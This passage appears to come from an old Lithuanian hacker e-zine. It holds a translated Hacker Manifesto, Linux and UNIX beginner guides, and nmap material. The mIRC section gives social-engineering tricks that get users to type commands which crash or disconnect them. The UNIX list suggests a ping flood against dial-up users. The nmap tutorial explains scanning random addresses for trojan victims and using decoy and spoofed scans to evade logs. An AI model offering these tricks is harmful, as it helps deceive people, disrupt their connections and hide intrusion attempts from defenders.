abejinguju. Tie, kurie ishtikruju turejo ko mokyti, laike mus daug

zhadanciais mokiniais, bet tie keli buvo kaip vandens lashas

dykumoje.

Dabar tai musu pasaulis. elektronu ir komutatoriu, baud’o grozhio

pasaulis.

Mes nemokame uzh paslaugas, kurios butu pigios, jei nebutu

kontroliujamos spekuliuojancziu apsirijeliu, ir jus vadinate mus

nusikalteliais. Mes tyrinejam. ir jus vadinate mus nusikalteliais.

Mes egzistuojame be odos spalvos, be tautybes, be religiniu

nusistatymu. ir jus vadinate mus nusikalteliais.

Jus konstruojate atomines bombas, jus kurstote karus, jus zhudote,

sukciaujate ir meluojate mums, bandydami mus itikint, kad tai musu

paciu labui, o mes vis dar nusikalteliai.

Taip, ash nusikaltelis. Mano nusikaltimas yra smalsumas. Mano

nusikaltimas yra tai, kad ash vertinu zhmones pagal tai, ka jie sako

ir galvoja, o ne pagal tai, kaip jie atrodo.

Mano nusikaltimas yra tai, kad ash protingesnis uzh jus, tai, ko jus

man niekad neatleisite.

Ash hackeris, ir tai mano manifestas. Jus galit sustabdyti viena,

bet jus negalit sustabdyti musu visu. Juk kaip ten bebutu, visi mes

vienodi.

+++The Mentor+++

——————————————————

Verte Meshkutiz Grizlius & M.Mazhvydas, ish

‘HACKERS MANIFESTO’ by The Mentor

——————————————————

29. mIRC bug’s

Shtai keli budai kaip apgauti lamerius padariusiu takeover! kokiame nors jusu kanale:

1.Galite apsimesti reklamos agentu sakydami : “Sveikas jei nori waru takeoveriu ir viso kito ateik i kanala #6,0”, kai jis parashys /j 6,0 ar /j #6,0 ir paliks visus kanalus iskaitant ir tavo! Zhodzi ureikia lameri priversti parashyti /j 6,0 tada jis paliks kanala! Zhodziu netures opo!

2.Gali pasakyti dar ka : “Sveiki ash esu botas eggdropas del papildomu komandu rashykite /con/con”, jei jis parashys tai jis jau skaitykite atgavote kanala, lameriukas dabar perkrauti kompa turi! (Taip jam ir reikia)

3. Dar vienas geras budas pamokyti lamerius(takeoverintojus) – jei sako kad nori opo, jam sakyk rashyk /server op #hakeriai ir jam geraj nesibaigs, nes jis jau ***Lamer has quit IRC!!!!

Realiai shi komanda pakeichia serverius pvz jei jis parashytu /server irc.is.lt jis tik jungtusi prie jo. O musu kietajam hakeriu vien zhodis /server ka reishia!!!! =]

Nu bet atsiminkite kad shie budai veikia tik totaliems neishmaneliams!

NU tiek Craft[Eye] – CraftEye@gmx.net

30. mIRC invisibility

2000.10.26 (c) J-azz

*Life iz sux*

*Telekomaz Must die*

*J-azz iz Alive*

He110, everybody. na ka kadangi zhiuriu kazhkajp visi aptilo su txt’u rashymu,

taj sakau gal man rejkia pagelbet.

Ajshq shis textaz yra skirtaz TIK 🙂 mokymo tixlamz ir ash jokioz atsakomybez

neprisiimu. Ir uzh skajtytojo vejxmuz neatsakau.

Texte vartojami ishsirejshkimaj neatitinka lietuviu kalboz normu.

Taj ka vazhiuojam? oky-doky..

31. mIRC’o slaptybez

(Pagal “Efektivnij Hacking” by Aleksej Petrovskij, Boris Leontjev)

*Ivadaz*

Taj ka bichiuli atsibodo paprastaj bazarint ir kabint panaz, kurioz

tik slepdamosi uz monitoriauz atrodo kjetoz? 0 susitikuz neishtrauki nej

zh0dzhi0. hmmmm.. That’z n0 c00l? I kn0w, I kn0w. Na ka pradedam su rimtesniaiz

dalykajz. na chia shitam txt’e, nebus njeko tokio kazhko ypatingo,

bet. svarbu info.. ania? Lekjam toliau, atsidaryk alauz ir skaityk..

*Tapk nematomaz*

Na chia tox dalykaz kaip nematomumaz. Ivykdome komanda:

/mode $me +i

Paprasta? Ir kas tau ish to? Na gi nieko ypatingo, tu tapaj nematomas visjemz qrie

nezhino tavo tixlaus nick’o.. ir be to negales taves rast pagal Userid(dalis tavo

y-mail’a iki simbolio @), bej bandydami su komandom /who arba /names

Naujausiose IRC versijose taj jau gali ijungti ir lange Setup uzhdedamaz varnele ant

Invisible Mode Ajshq, jei uzhejsi i kanala tu tapsi matomu(matysis nick’az).

*Komanda /who*

Pakankamaj galinga pajeshkoz komanda yra /who, pagal kokia nors jau zhinoma informacija.

Ir kazhkodel taj apie taj nej zhodzhiu neuzhsiminta mIRC’o Help’e(Pac netikrinau ar

tikraj nera, pasitikiu shaltiniu). Naudodami komanda

/whois Lamer

Mes dazhniausiai gaunam kazhka panashaus i taj:

Lamer ~qrutaz@takas.mustdie.lt * cool

Lamer on #lamerland #qrutaj

Lamer using irc.omnitel.net[193...]

Omniteliz

End of /WHOIS

Komanda /who lejdzhia daryti pajeshka pagal mums jau zhinoma dali, pvz. Real Name, Userid. etc.

pvz:

mes jeshkom kahzko ish Marijoz zhemez:

/who *.lt*

arba tu jau bendravaj su Lamer’iu ir nori ji rasti vel:

/who *qrutaz*

arba

/who *cool*

Tajp gali rasti ir tave jei nesinaudosi nematomumu.

*ThE EnD*

Taj tjek apje IRC 2night. CUL

P.$.

Jei bus dar alauz ir merdzhinu, taj bus dar ir textu.. 😉

[Njeko nekejsdami galite lajsvaj platinti]

P.$.$.

4 more info check me out on Internet

y-mejl: J-azz@centras.lt

32. NAMEZERO

Namezero.com Uzhejes i tikrai shaunu saita UID0 pamachiau straipsni apie Namezero baneriu panaikinima. Tikrai idomus faktas apie tai, kad namezero baneriai yra sudaryti ish papraschiausiu frame’u. SaTaN sugalvojo buda, kuris nukilina namezero frame’a. Atrodytu butu viskas labai shaunu, bet su nukilintu frame’u dingsta ir jusu domenas narshykles adress bare (ten lieka jusu tikrojo puslapio adresas.). nemanau, kad tai tenkina mus, todel yra ir kitas budas. ish pradzhiu pasidarome www.namezero.com accounta. Savo accounto viduje rasi skiltele “Home Page”. Ten yra nustatomas tikrasis jusu domeno adresas “Actual URL”, Keyworday “Keywords” ir Aprashymas “Description”.i actual URL bei KeyWords rashykit ka tik norit. Mus reikia butent descriptnion, kurio textas naudojamas banerio fraime. Shtai ka jums teks ten irashyti: “>

33. Linux Naujokams

Trumpas Linux totorial`as naujokams

Turinys:

1. Kas yra Linux?

2. Kodel atsirado Linux?=-

3. Linux instaliavimas

4. Linux komandos

5. Linux konfiguravimas

6. Kas yra Xwindows?

1. Kas yra Linux?

Linux yra Unix tipo operacine sistema, skirta tinklo kompiuteriams (aisku gali buti ir ne tinklo kompiuteriuose). Linux yra registruotas prekinis zenklas Linus’o Torvalds’o (Linus Torvalds) operacines sistemos, kurios branduoli jis (su draugais) parase 1991 metais. Linux daugiaprogramine (multitasking) ir daugiavartotojine sistema. Kiekvienas vartotojas turi atskiras teises. Linux yra gan saugi OS. Linux yra pirmoji operacine sistema parasyta uz JAV ribu.

2. Kodel atsirado Linux?

Seniau Unix tipo operacines sistemos buvo gan brangios ir buvo sunku gauti jos pradinius kodus arba nebuvo ju galima keist. Tad vienas studentas suomis, Linus Torvalds sugalvojo parasyti savo operacines sistemos branduoli, kuris butu

laisvai platinamas, butu galima keisti jo pradinius kodus ir t.t. Tad X-o desimtmecio pradzioje pasaulis isvydo nauja OS, kurios branduoli sudare 10 000 Linus`o parasytu C kalbos eiluciu. Kiekvienas galejo laisvai gauti sio branduolio koda, kiekvienas galejo ji tobulinti, taisyti klaidas. Ir stai- greitai Linux populiarumas pradejo augti. Vis dazniau ji imta naudoti serveriuose. Daugelis programuotoju ja tobulina. Beje, visa tai jie daro dykai, savo ir kitu labui.

3. Linux instaliavimas

Patarimas: jei jus norit tureti be Linux savo kompiuteryje ir windows- pirmiau instaliuokite windows (nepamirskit palikti atskira skirsni Linux), o poto Linux.

Visu pirma norint instaliuoti Linux, reikia apsispresti kokia Linux distribucija instaliuosite. Ju yra daugelis: Debian, RedHat, Open Linux, Mandrake, SlackWare ir kt. Jos skiriasi savo programu paketais ir siektiek savo konfiguravimu. RedHat dazniausiai naudojama pradedanciuju, nes joje yra rpm- greitas, patogus programu instaliavimo budas.

Apsisprendus kokia distribucija naudosit reikia is Linux CD pasidaryti pakrovimo diskeli (dazniausiai su programa rawrite.exe).

Instaliavimas pradedamas uzkrovus kompiuteri is to diskelio. Tada reikia nurodyti is is kur instaliuosite (kieto disko, tinklo, cdrom), kokia kalba naudosite, kokia klavetura turite ir pan.

Linux`ui skirtingai nei MS-DOS, windows reikia ne vienos particijos, o maziausiai dvieju: root particijos ir swap particijos. root particijoj laikomas Linux branduolys ir kiti jam reikialingi failai. swap particija naudojama laikiniems failams kuriti, taip kaip windows`u swap failas. Swap particija geriausiai kutri dvigubai didesni nei jusu RAM kiekis. Tada kompiuteris gales vykdyti programas kurioms reikia daugiau atminties negu jusu RAM. Jei jus instaliuosite Linux tik i sias dvi particijas jusu sistema bus tarsi skardineje. Norint kad taip nebutu reikia sukurti daugiau particiju: /home, /tmp, /usr. /home particijoj saugomi visi vartotoju failai, tad jo dydis priklauso nuo vartotoju skaiciaus ir ju poreikiu. /tmp particija panaciai kaip ir swap particija laiko laikinus failus. Skirtumas tas kad tmp particijoje laikomi paciu

programu laikini failai, o ne branduolio (kernel). /usr particijoje saugoma visos nesistemines programos, bei kiri joms skirti failai. /usr particijos dydis priklauso nuo vartotoju reikalingu programu, bet is patirties zinau kuo daugiau skirsite siam skirsnui vietos tuo geriau.

Beje, patarimas: Is karto apgalvokite ko jus norite, kiek viskas gali uzimti ir t.t., nes:

1.jei skirsnis (ypac /tmp) koks prisikemsa tai tada linux`as veikia kaip ant 386.(dazniausiai isvis luzhta)

2. Persigalvojus nera jau taip lengva perskirstyri diska. Jei vienam skirsni pritruko vietos, o kitam jos yra, nubus lengva is vieno

skirsnio vieta perduoti kitam.

Mano disko suskirstymas atrode taip:

/ 150 MB – slesas reiskia root particija.

/tmp 100 MB – tmp particija

100 MB – swap particija neturi mount point`o (pavadinimo pvz. /; /tmp ir t.t).

/home 300 MB – vartotojams skiriau 300 MB (turint omeni, kad ju bus tik du).

/usr 3 GB- skyriau visa likusia disko vieta, nes zinau kad xwindows ryja vieta, o jei noresiu dar ir StarOffice.

Beje, visi skirsniai turi buti Linux Native failu sistemos, tik swap turi buti Linux Swap failu sistemos.

Suskircius diska lieka tik menkniekiai: nurodyti kuriuos paketus instaliuoti, nurodyti tam tikra savo hardware bei jos parametrus

bei ivesti galiausiai root slaptazodi.

Is viso sito dar reiktu isskirti lilo konfiguravima. LILO (linux loader) yra programa kuri pasileidzia pries os uzkrovima ir pati uzkrauna

linux, dos ar kita OS. Jei jusu Linux root skirsnis yra daugiau negu 500 MB nuo disko pradzios LILO (naujoms LILO versijoms giliai nusisivilpt tas 1024-as cilindras-dek kur nori) turite deti i MBR (master boot record), kitais atvejais galite deti kitur. Beto galite nurodyti kokia OS krauti pagal nutylejima, kokios bus OS zymes (Linux pagal nutylejima buna “linux”, windows- “dos”). Taigi jus jau Linux instaliavote i savo kompiuteri. Kaip ji pakrauti? Kai ijungiate kompiuteri isvystate kazka panasaus i:

LILO:

Ten surenkate norimos OS zyme ir spaudziate enter. Jei zymiu nezinot ar nepamenas paspauskoit tab ir jas isvysit.

4. Linux komandos

Is pirmo zvilgsnio Linux konsole yra tas pats kas ir DOS. Bet is tikro jos labai skiriasi. Konsoleje galime daryti visa

ta pati ka ir DOS bei daug daug daugiau: kurti gerus sistemos scenarijus (skriptus), konfiguruoti Linux etc.

Cia pateikiu keleta Linux komandu be kuriu darbas su Linux negalimas:

cd (change directory)- pakeiskti aktyvu kataloga, dos analogas cd.

(atminkit kad Linux yra skirtumas tarp didziuju ir mazuju raidziu)

pwd (print working directory)- parodo aktyvu kataloga.

ls- isveda aktyvaus katalogo failu ir katalogu sarasa.

rm- istrina kataloga.

chsh (change shell)- keitce user`io shell

passwd – pakeicia userio slaptavardi

man (manual)- parodo komandos ar ko kitko aprasyma (manual).

linuxconf – linux sistemos konfiguravimas. [ne komanda, o programa, kitur gali nebut]

setup- linux paketu konfiguravimas, laiko, peles, garso kortos nustamas it t.t.

Kiti dalykai kurie pravers: ~ (tilde) – resikai jusu home kataloga. Tad jei norite gristi i savo home kataloga galite rasyti

cd /home/tavo_useris/ arba cd ~. Na o jei rasysite cd ~user, tai jus busite perkeltas i user userio kataloga.

5. Linux konfiguravimas

Zinot Linux programuotoju posaki: “Kam programuoti jeigu galima konfiguruoti?”. Taigi Linux daug ka reikia atlikti paciam. Visi Linux konfiguraciniai failai yra /etc kataloge arba jusu home kataloge. Tu failu yra daugelis, tad as paminesiu tik keleta:

/etc/passwd – saugo informacija apie Linux vartotojus, ju home katalogus, shell`a ir kt.

/etc/shadow – saugo uzkuodotus vartotoju slaptazodzius.

.bachrc, .bashprofile – bash (Bourne Again SHell) shell`o konfiguraciniai failai.

Kaip konfiguruoti Linux placiau suziosite skaitydami how-to arba manual.

6. Kas yra xwindow?

xwindow yra grafinis linux apvalkalas (X Window linuxistai vadina XFree86, o tikrasis X Windows yra skirtas UNIXUI ir kitiems

pobrangiem *IX’ams, jis juk ne nemokamas ), kuris leidzia dirbti su Linux vizualiomis priemonemis. X Window System, sutrumpintai vadinama X Window arba tiesiog X, yra paremta kliento/serverio architektura. X serveris – grafikos, klaviaturos bei peles draiveriu visuma, leidzianti kelioms programoms (X klientams) rodyti bet ka atskiruose, gal but persidengianciuose languose. Pavyzdiai: XFree86 serveriai (XF86_SVGA, XF86_S3 ir t.t.), Metro X, Accelerated X. Visi X klientai yra lygus, bet vienas is ju lygesnis uz kitus. Jis vadinasi window manageriais. Window managerio paskirtis – duoti kiekvienam langui remeli su pavadinimu, pora arba kelias desimtis mygtuku (uzdarymo, padidinimo ir t.t.), jis pirmas apdoroja klaviaturos bei peles paspaudimus ir leidzia langus nesioti, didinti, iskelti i prieki, aktyvuoti ir taip toliau. Pavyzdiai: Enlightenment, kwm (i KDE), fvwm, Window Maker etc. Toliau lieka tik vartotojo programos. Jos, zinoma, galetu pacios keistis su X serveriu zemo lygio komandomis, bet daug

paprasciau naudoti pilnavertes bibliotekas. Sios biliotekos suteikiaivairiu standartiniu irankiu (vadinamu ‘widget’) – mygtuku, scrollbaru ir t.t. Pavydziai: Xaw (Athena Widget Set), Xaw3d, Motif, Gtk+, Qt. Galu gale beliko desktopai. Desktopo paskirtis – suteikti ivairioms programoms vienoda isvaizda ir naudojima (‘look and feel’). Paprastai desktopa sudaro biblioteka, window manageris ir kruvele bendros paskirties programu (paleidimo panele, failu tvarkykle ir t.t.). Pavyzdiai: CDE, KDE, Gnome.

Galvojo ir bade si teksta SaTaN, koregavo LivDea.

34. UNIX Naujokams

By Craft[Eye] www.underground.lt CraftEye@gmx.net

TAIGI FREE SHELLS(kai kuriu yra puslapiai, kai kuriems rashote newuser

shelle prisijunge su telnet per 23 porta):

havoc.net – Niekas IRC botu neleis det.

pooki.smartec.com – Truputi letas.

nether.net – Labai gerai zhinomas. Taip pat labai uzhbaigtas,

su juo gausite 3 megabaitus vietos. Telnete surinkite newuser.

nyx.net Turesi nusiusti maila tam, kad uzhsiregistruotum.

Negausi daug vietos diske.

suburbia.net Sysadminai parashe tinklo skaneri – ‘Strobe’.

cyberspace.org Originalus shellas – pradedantiesiems bus grazhus

menu.

Ashpool.com Hmm shellas. =]

Arbornet.org Meshlas

TakiWeb.com Dar vienas shellas.

Kai kurios UNIX komandos ir trumpas aprashymas.

alias – leidzhia vartotojui pamatyti esamus aliasus

bdiff – sujungia du didelius failus

bfs – skanuoja dideli faila

cal – parodo kalendoriu

cat – parodo failo turini

cc – c programavimo kalbos kompiliatorius

cd – keicia direktorija

chgrb – keicia failo priklausomybe grupei

chmod – keicia failo atributus

chown – keicia failo priklausomybe useriui

cmp – palygina du failus

comm – sujungia du failus taip kad vienodos eilutes butu pashalinamos

cp – kopijuoja faila i kita vieta

cu – iskviecia kita unix sistema

date – parodo tikslu laika ir data

df – parodo visus prijungtus irenginius tavo mashinoje

diff – ishspauzdina dvieju failu skirtumus

du – parodo direktorijos ishnaudojima vieta blokais

echo – ishveda teksto eilute

ed – paprastas tekso redaktorius

env – nustato aplinkos kintamuosius

ex – tiesiog kitas teksto redaktorius

expr – apsluates a mathmatical formula

find – randa faila

f77 – fortrano programavimo kalbos kompiliatorius

format – paruoshia diskeli

grep – ieshko duomenu tekste

help – parodo pagalba

kill – sustabdo veikianti processa

ln – sukuria nuoroda tarp dvieju failu

lpr – kopijuoja faila i paralelini printeri

ls – parodo visus failus ir katalogus esanchius direktorijoje

mail – leidzhia vartotojui siusti/gauti pashta

mkdir – sukuria direktorija

more – ishveda duomeu faila i ekrana

mv – naudojamas tam, kad pervardintu ar perkeltu direktorijas

nohup – leidzhia komandai veikti net tada kai tu isheini ish shello

nroff – naudojamas tam, kad formatuoti teksta

passwd – pakeichia tavo passworda

pkgadd – instaliuoja nauja programa tavo mashinoje

ps – parodo shiuo metu dirbanchius procesus

pwd – parodo aktyvia direktorija kurioje tu dirbi

rm – trina nurodyta faila

rmdir – trina nurodyta direktorija

set – parodo visu kintamuju esanchiu shell’e vardus

setenv – nustato aplinkos kintamuosiu

sleep – padaro veikenti procesa neaktyvu

source – leidzhi paleisti faila ir pakeisti bet kurias pasikeitusias

reikshmes faile

sort – surushiuoja failus

spell – ieshko rashybos klaidu norodytame faile

split – padalina faila

stty – nustato terminalo parametrus

tail – ishspauzdina failo gala

tar – nukopijuoja visus nurodytus failus i viena

touch – sukuria nauja tuschia faila arba nustato laika/data failui

troff – ishveda suformatuota ishvesti =]

tset – nustato terminalo tipa

umask – nurodo nauja sukurimo mask’a

uniq – palygina du failus

uucp – unix i unix paleidimas

vi – editorius per visa ekrana

vipw – atidaro vi editoriu taip kaip password fiaila redagavimui

volcheck – patikrina ar yra prijungtas diskelis prie tavo mashinos

wc – skaichiuoja failo, zhodzhius, eilutes ir t.t.

who – informacija apie kita zhmogu online

write – nusiunchia zhinute kitam vartotojui

sleep – nieko nedaro tam tikra laiko tarpa

logname – parodo logo varda

dd – vygdo keitimus kopijuojant

du – parodo kiek vietos sunaudota

mount – montuoja failines sistemas

cut – ishtraukia pasirinktas failu dalis

fold – perkelia ilgas eilutes

join – apjungia eilutes ish skirtingu failu

od – dvejetainis dampas

paste – apjungia failu eilutes

pr – skaido failus i puslapius

sort – rushiuoja duomenis failuose

strings – ishgauna teksta ish failo

sum – skaichioja galutine kotroline suma

tr – keichia simbolius

basename – ishgauna failo varda ish pilno kelio

dirname – ishgauna direktorijos varda ish pilno kelio

false – grazhina reikshme false(nedaro nieko 🙂

true – grazhina reikshme true(nedaro nieko 🙂

groups – ishveda duomenis apie vartotoju priklausomybe grupems

hostname – parodo tikslius duomenis apie vartotoja

nice – nustato esamo proceso prioriteta

pathchk – patikrina kelius

printenv – ishveda aplinkos kintamuosius

stty – parodo arba pakeichia terminalo parametrus

su – ledzhi tapti kitu vartotoju

tee – sukuria keleta ishvedimo kanalu

test – patikrina faila ir simboliu eilute

tty – ishveda terminalo pavadinima

uname – ishveda duomenis apie operacine sistema ir pan.

users – parodo dabar esanchius vartotojus prisijungusius prie sistemos

who – pasako kokie vartotojai uzhregistruti ir t.t.

whoami – parodo kas per vienas(velnias;) tu esi

man – parodo pagalba apie, bet kuria komanda – dazhniausiai naujoku

naudojama

komanda =]

! – pakartoja komandas

——————————————————————————

Network komandos:

telnet – telnetas tavo shelle

who – parodo kas yra prisijunges prie LAN

netstat – prisijungimu statistikos

finger – informacija apie tinklo vartotojus

ping – skirta tikrinti ar yra ryshys su tam tikra mashina(daugelis

naudoja ja kokiams nors serveriui pakabinti ar ishmesti ish dial-up,

jei greitas ryshys tai suvede komanda ping -c 50000 127.0.0.1 tikriausiai

dial-up niekada neatlaikys =)

ftp – leidzhia parsisiusti/siusti failus

whois – informacija apie interneto mazgus

nslookup – more informacija apie interneto mazgus

dig – tas pats kas ir nslookup tik dar daugiau, jei panaudosite

tinkamus raktus galite ishtraukti neblogos informacijos

—————-End Of Commands List

Na zhodzhiu dabar jau palieku ash jus vienus ir darykit ka jus norit

su tuo UNIX – svarbiausia darykit.

Na shiam kartui tiek..

Craft[Eye] : UNIX rulezz if you rule UNIX =]

EOF

General Protection Fault.. Kernel Panic.

35. Nmap’o panaudojimas hack’o tikslais

1.Info

Jei rimčiau susidomėsite darbu su nmap’u, tuomet būtinai apsilankykite siame saite:

http://www.insecure.org/nmap.

2.Kas yra nmap’as ?

Nmap’as tai tinklo skenavimo programa.Jo pagalba jūs galite tikrinti savo, bei kitų

tinklų saugumą.Tiksliau jūs galite skanuoti portus, bei suzinoti ar juos dengia koks

nors firewall’as.Taip pat galima su nmap’u galima nustatyti kito kompiuterio operacinę

sistemą, tereikia tik ip adreso ir aišku interneto ryšio.

3.Trūkumai ir bugai

Daugumą šiame dokumente aprašytas funkcijas galima atlikti tik iš root’o.Tai

galima sakyti yra pats didžiausias šios programos trūkumas ar bugas.

4.Pradedam

Dokumentas parašytas pagal 2.3BETA14 versiją.

Primiausia reikia atsisiūsti šia programą.O poto atlikti šiuos veiksmus:

# cp nmap-2.3BETA14.tar.gz /usr/local/src

# cd /usr/local/src/

# gunzip nmap-2.3BETA14.tar.gz

# tar -xvf nmap-2.3BETA14.tar

# rm nmap-2.3BETA14.tar

# cd nmap-2.3BETA14/

# more INSTALL

# ./configure && make && make install

# rm -rf nmap-2.3BETA14/

Lets go !

5.Komandų sintaksė yra tokia

# nmap [skanavimo tipas(ai)] [opcijos]

5.1. Skanavimo tipai

Manau šis tipas hackeriams beveik nereikalingas.Nmap’as jungiasi prie kiekvieno

-sT porto iš eilės.Todel viskas loginama loguose ir tave tikrai suseks.Šis būdas yra tiksliausias

bet ir pavojingiausias.TCP connect skanavimas.

Šis būdas jau saugesnis tačiau ne visada , pvz jei stovi firewall’as.Skanuojant tokiu būdu

-sS nėra padaromas TCP prisijungimas, o paprasciausiai nusiunciamas TCP SYN paketas kaip norint

prisijungti ir laukiama atsakymo.TCP SYN skanavimas.

-sF, -sX, -sN

Tai saugesnis už TCP SYN skanavima bet turi vieną labai rimtą trūkumą.Nei vienas iš jų neveikia

Microsoft sistemoms.Stealth FIN, Xmas Tree bei Null skanavimo režimai.

-sU UDP portų skanavimas, beprasmiškas naujoms sistemoms.Ir trunka labai ilgai.

5.2 Bendrosios opcijos ( Štai ir pats smagumas prasideda)

-P0 Skanuoja išarto nebandęs prieš tai pinginti hosto.Reikalingas tokiems servams kurie neatsakinėja

į ICMP echo request’us ( pvz. pop.takas.lt)

-O Zjbiškiausia nmap’o funkcija.Atpažįsta kompo OS pagal jo fingerprint’us.

-oN

Viską kas vyksta ekrane logina i nurodytą failą.

-iR Dar viena labai cool nmap’o funkcija.Pats nmap’as generuoja bet kokius ip adresus ir

skanuoja nurodytus portus.Jei ieškote kokiu trojanų auku tiesiog rašykite

nmap -sS -iR -p 1234(portas) 127.0.0.1.

-p

Galite nurodyti kuriuos ar kurį portą tikrinti.

-p 21,60-90,1243 — 21, visi nuo 60 iki 90 bei 1243 port

-D

Decoy skanavimas priverčia skanuojamą host’ą manyti, kad jį vienu

metu skanuoja visi nurodyti decoy’iai. Hostų logai gali parodyti

5-10 skanavimų is unikalių IP adresų, bet kuris iš jų skanuoja

iš tikro jie pasakyti negalės.

Reikia atskirti vien1 decoy nuo kito kableliais be tarpo, tarp jų gali

įrasšyti ME, tai bus tavo IP adresas.Jei neįrašysi ME, tai nmap’as parinks

vietą tavo IP pats.

Tik reikia prisiminti, kad decoy įrašyti hostai turi būti gyvi, kitaip

gali uz-SYN-flood’inti taikinį.Beto labai nesunku bus surasti tave, jei tik

tavo IP bus gyvas iš visų decoy’ų.

Reikia pasakyti kad kai kurie portų skanavimo detektoriai gali išviso uždrausti priėjimą

skanuojantiems hostams.Todėl būtų linksma jei kartą nurodytumėt vieną iš decoy’ų pvz. 127.0.0.1

Decoy gali būti naudojamas kartu su ping, tikru portų skanavimu ar su OS nustatymu (-O).

-S

Kartais nmap’as gali nerasti jūsų adreso.Tokiu atveju galima naudoti -S funkciją su jūsų IP ir

interfeisu kuriuo norite siūsti paketus.

Tokiu būdu galite nurodyti kieno nors kito ip adresą ir isdurti taikinį,

-e Interfeisas

Pvz. eth0, lo, ppp0 ir kt.

-g Nurodo is kokio porto skanuoti.

-T

Paranoid pats lečiausias skanavimo būdas, bet ir tiksliausias, Insane pats greičiausias, tačiau

ne toks tikslus.

5.3.Pavyzdžiai

# nmap -sX -e lo -P0 -S 127.0.0.3 localhost

Xmas Tree būdu aš skanuoju savo localhost’ą apsimesdamas 127.0.0.3.Loopback interfeisu.Va ką

rodo ipchains’ų logas:

Packet log: input DENY lo PROTO=6 127.0.0.3:37009 127.0.0.1:139

L=40 S=0x00 I=53682 F=0x0000 T=41 (#1)

Kernelis įsitiknęs kad jį skanuoja 127.0.0.3.

# nmap -sN -D microsoft.com,mail.takas.lt,ME -oN /tmp/mad -p 1-1024 -O mad.com

Null skanavimo režimu , panadodamas du decoy adresus, viską logina į /tmp/mad failą.Skanuoja

nuo 1-1024 portus ir bando atspėti OS mad.com serverio.

6.Pabaigai

Na pvyzdžių man atrodo daug nereikia jei turite lakią fantaziją jų prisigalvosite patys.

Wrote by Z-Man (z-man@scientist.com)

Nmap network security scanner man page (Lithuanian translation)

36. NMAP (2)

PAVADINIMAS

nmap – tinklo tyrinėjimo įrankis bei saugumo skeneris

SINTAKSĖ

nmap [skanavimo tipas(ai)] [opcijos]

APIBŪDINIMAS

nmap’as yra sukurtas tam, kad leistų sistemų administrato­

riams bei smalsiems individams skanuoti didelius tinklus,

siekiant nustatyti kokie hostai yra veikiantys ir kokias

paslaugas jie siūlo. nmap’as turi be galo daug skanavimo

technologijų, tai: UDP, TCP connect(), TCP SYN (pusiau

atviras), ftp proxy (bounce ataka), Reverse-ident,

ICMP(ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep,

bei Null skan’as. Skanavimo Tipai sekcijoje rasite apie

tai smulkesnės informacijos. nmap’as taip pat turi

nemažai pažangių savybių, tokių kaip nutolusio kompiuterio

(toliau vadinamo ‘remote’) (O)peracinės (S)istemos nus­

tatymas per TCP/IP fingerprintinima, stealth (vogtinis)

skanavimas, dinaminės pauzės ir retransimisijos skaičiavi­

mai, lygiagretusis skanavimas , nepasiekiamų host’ų nus­

tatymas skanuojant lygiagrečiu skanavimo metodu, decoy

skanavimas, filtruojamų portų nustatymas, tiesioginis RPC

skanavimas, fragmentinis skanavimas, bei labai lankstus

taikinio ir portų nurodymas.

nmap’o autorius stengiasi kaip galima daugiau įvairių

nmap’o galimybių suteikti ne tik root vartotojui, bet ir

paprastam sistemos vartotojui, deja daugėlis kritinių sis­

temos branduolio (kernel) interfeisų (tokių kaip “raw

socket’ai”) reikalauja root’o privilegijų, todėl nmap’as

turėtų būti naudojamas root’u kai tik įmanoma.

nmap’o naudojimo rezultatas dažniausiai būna paprasčiau­

sias sąrašas įdomių portų, rastų skanuojamoje

mašinoje(se). Nmap’as visada parodo kokią paslaugą (ser­

vice) teikia portas, jo numerį, būseną bei protokolą.

Būsaną nusako vienas iš trijų žodžių: “open”, “filtered”,

“unfiltered”. “open” (atviras) reiškia, kad taikinys leis

prisijungti prie šito porto. “filtered” (filtruojamas)

reiškia, kad firewall’as (ugnies siena), filtras ar dar

kažkoks įdomus įrankis dengia portą, dėl to nmap’as tikl­

siai negali nustatyti ar portas atviras. “unfiltered”

(nefiltruojamas) parodo, kad portas yra tikrai “closed”

(uždarytas) ir nera dengiamas jokio firewall’o/filtro.

Nefiltruojamas portas yra gan įprastas atvėjis ir yra

rodomas tik tuo atveju, kai dauguma iš skanuotų portų yra

filtruojami.

Priklausomai nuo to, kokios opcijos naudojamos, nmap’as

taip pat gali parodyti ir nutolusio kompiuterio:

(O)peracinę (S)istemą, TCP susekamumą, vartotoju vardus,

kuriems priklauso tam tikri procesai, DNS vardus ir dar

vieną kitą.

OPCIJOS

Prasmingos opcijos visos gali būti rašomos kartu (t.y.

vienoje eilutėje). nmap’as stengsis pasakyti, kokias

klaidas esate padarę (aišku jei esate :).

Jei esate nekantrus, galite iškarto šoktelti į sekciją

pavyzdžiai gale dokumento, kur gan aiškiai parodo naudo­

jimą. Taip pat galite paleisti nmap -h ir pamatysite

pagrindines opcijas, su trumpais aprašymais.

SKANAVIMŲ TIPAI

-sT paprasčiausias TCP connect() skanavimas. Jūs ban­

dote prisijungti prie kiekvieno porto iš eilės. Jei

portas klausosi, nmap’as prisijungia prie jo, taigi

jei host’as logina, jis matys, kad bandote jungtis.

Šis metodas yra tiksliausias, bet rekomenduočiau jį

naudoti tik tuo atveju, jei skanuojate savo ar

draugo kompiuterį, t.y. tokį, dėl kurio vėliau

tikrai nesusilauksite nemalonumų.

-sS TCP SYN skanavimas, kitaip dar dažnai vadinamas

kaip “pusiau-atviras” skanavimas, nes nėra padaro­

mas TCP prisijungimas. Jūs paprasčiausiai

nusiunčiate TCP SYN paketuką kaip kad norėdamas

prisijungti ir laukiate atsakymo. Pakankamai neblo­

gas metodas, bet jei yra filtruojamų portų (pvz.

pastatytas firewall’as) ir host kompiuteris juos

logina, – būsite pastebėtas.

-sF -sX -sN

Stealth FIN, Xmas Tree bei Null skanavimo režimai.

Tai yra šiek tiek saugesni skanavimo būdai nei TCP

SYN (pastebimumo atžvilgiu), bet deja nei vienas iš

jų neveikia M$ sistemoms. Iš kitos pusės, tai

nebloga priemonė, kurios pagalba galima nustatyti

ar tai M$ sistema ar ne, t.y. jei -sF -sX arba -sN

parodo, kad visi portai uždaryti, o -sS rodo kelis

atvirus portus, taikinys greičiausiai windows

dėžutė.

-sP Tai paprasčiausias ping’as, kuris parodo kurie

hostai tinkle yra gyvi. Atliekama paprasčiausiai

siunčiant ICMP echo prašymą (request). Deja kai

kurie saitai (kaip mail.takas.lt) blokuoja

prašymus. Kad iš tikro įsitikinti, ar hostas negy­

vas, nmap’as nusiunčia ir TCP ack paketuką į 80

(standartiškai) portą. Jei gauname atgal RST,

